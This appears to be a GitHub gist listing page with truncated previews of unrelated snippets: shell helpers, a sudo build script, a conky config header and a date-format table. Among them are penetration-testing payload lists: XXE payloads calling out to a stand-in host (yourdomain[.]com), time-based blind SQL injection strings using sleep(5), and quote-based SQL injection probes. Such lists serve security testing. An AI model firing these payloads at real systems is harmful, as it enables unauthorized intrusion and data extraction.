This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
https://web.archive.org/cdx/search?url=SITE&matchType=prefix&collapse=urlkey&output=txt&fl=original |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
foreach($line in [System.IO.File]::ReadLines("D:\1.txt")) {iwr -Uri $line -Method GET -Proxy http://127.0.0.1:8080 | Out-Null} |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
curl -s https://api.github.com/repos/user/reponame/releases/latest | grep -E 'browser_download_url' | grep linux_amd64 | cut -d '"' -f 4 | wget -qi - |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/sh | |
echo-bold(){ | |
echo -e '\e[1m'$1'\e[0m' | |
} | |
echo-black(){ | |
#You probably shouldn't use this | |
echo -e '\e[30m'$1'\e[0m' | |
} | |
echo-red(){ |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
wget --progress=bar https://www.sudo.ws/dist/sudo-1.9.5p2.tar.gz | |
tar xzvf sudo-1.9.5p2.tar.gz | |
cd sudo-1.9.5p2 | |
./configure | |
make && sudo make install | |
bash -c "sudo --version" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# --------------------------------------------------------------------------------------------- # | |
# | |
# .conkyrc - derived from various examples across the 'net | |
# | |
# Some of the sites that proved most usful include: | |
# http://mylinuxramblings.wordpress.com/2010/03/23/how-to-configure-the-conky-system-monitor/` | |
# http://crunchbanglinux.org/wiki/conky | |
# http://lusule.wordpress.com/2008/08/07/how-to-4/ | |
# | |
# --------------------------------------------------------------------------------------------- # |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x SYSTEM "http://xxe-doctype-system.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x PUBLIC "" "http://xxe-doctype-public.yourdomain[.]com/"><x /> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe SYSTEM "http://xxe-entity-system.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY xxe PUBLIC "" "http://xxe-entity-public.yourdomain[.]com/">]><x>&xxe;</x> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe SYSTEM "http://xxe-paramentity-system.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><!DOCTYPE x [<!ENTITY % xxe PUBLIC "" "http://xxe-paramentity-public.yourdomain[.]com/">%xxe;]><x/> | |
<?xml version="1.0" encoding="utf-8" standalone="no" ?><x xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://xxe-xsi-schemalocation.y |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Format options Purpose of Option Output | |
date +%a Displays Weekday name in short (like Mon, Tue, Wed) Thu | |
date +%A Displays Weekday name in full short (like Monday, Tuesday) Thursday | |
date +%b Displays Month name in short (like Jan, Feb, Mar ) Feb | |
date +%B Displays Month name in full short (like January, February) February | |
date +%d Displays Day of month (e.g., 01) 07 | |
date +%D Displays Current Date; shown in MM/DD/YY 02/07/13 | |
date +%F Displays Date; shown in YYYY-MM-DD 2013-02-07 | |
date +%H Displays hour in (00..23) format 23 | |
date +%I Displays hour (01..12) format 11 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sleep(5)# | |
1 or sleep(5)# | |
" or sleep(5)# | |
' or sleep(5)# | |
" or sleep(5)=" | |
' or sleep(5)=' | |
1) or sleep(5)# | |
") or sleep(5)=" | |
') or sleep(5)=' | |
1)) or sleep(5)# |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
'-' | |
' ' | |
'&' | |
'^' | |
'*' | |
' or ''-' | |
' or '' ' | |
' or ''&' | |
' or ''^' | |
' or ''*' |